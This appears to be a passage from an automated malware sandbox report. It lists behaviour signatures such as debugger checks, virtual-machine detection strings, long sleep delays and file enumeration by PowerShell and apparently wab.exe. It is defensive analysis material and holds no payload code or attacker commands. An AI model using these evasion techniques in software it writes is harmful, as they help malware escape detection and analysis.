              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A6D1C0 rdtsc 27_2_22A6D1C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,16_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_3_226529F0 sldt word ptr [eax]27_3_226529F0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5307Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4573Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6848Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2862Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3096Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 442Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 5568Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: foregroundWindowGot 1709Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6071
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3698
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6809
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2590
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 717
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.6 %
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 0.9 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6776Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4184Thread sleep count: 6848 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5832Thread sleep count: 2862 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1472Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1280Thread sleep count: 3096 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2616Thread sleep count: 442 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2616Thread sleep time: -1326000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2616Thread sleep count: 5568 > 30Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2616Thread sleep time: -16704000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1016Thread sleep time: -18446744073709540s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1512Thread sleep count: 6809 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5984Thread sleep count: 2590 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5560Thread sleep time: -6456360425798339s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3908Thread sleep count: 717 > 30
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 3096 delay: -5Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_21CB10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_21CB10F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_21CB6580 FindFirstFileExA,11_2_21CB6580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040AE51 FindFirstFileW,FindNextFileW,16_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,18_2_00407898
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00418981 memset,GetSystemInfo,16_2_00418981
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: wscript.exe, 00000013.00000003.2548910255.000000000352E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
              Source: wab.exeBinary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000014.00000002.3392964729.00000000076E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
              Source: powershell.exe, 00000003.00000002.2687473128.0000024A5ABB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3018%SystemRoot%\system32\mswsock.dll0
              Source: wscript.exe, 00000013.00000003.2548231956.000000000351F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_17-34129
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\clip.exeProcess queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 27_2_22A6D1C0 rdtsc 27_2_22A6D1C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04668528 LdrInitializeThunk,6_2_04668528
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_21CB60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_21CB60E2
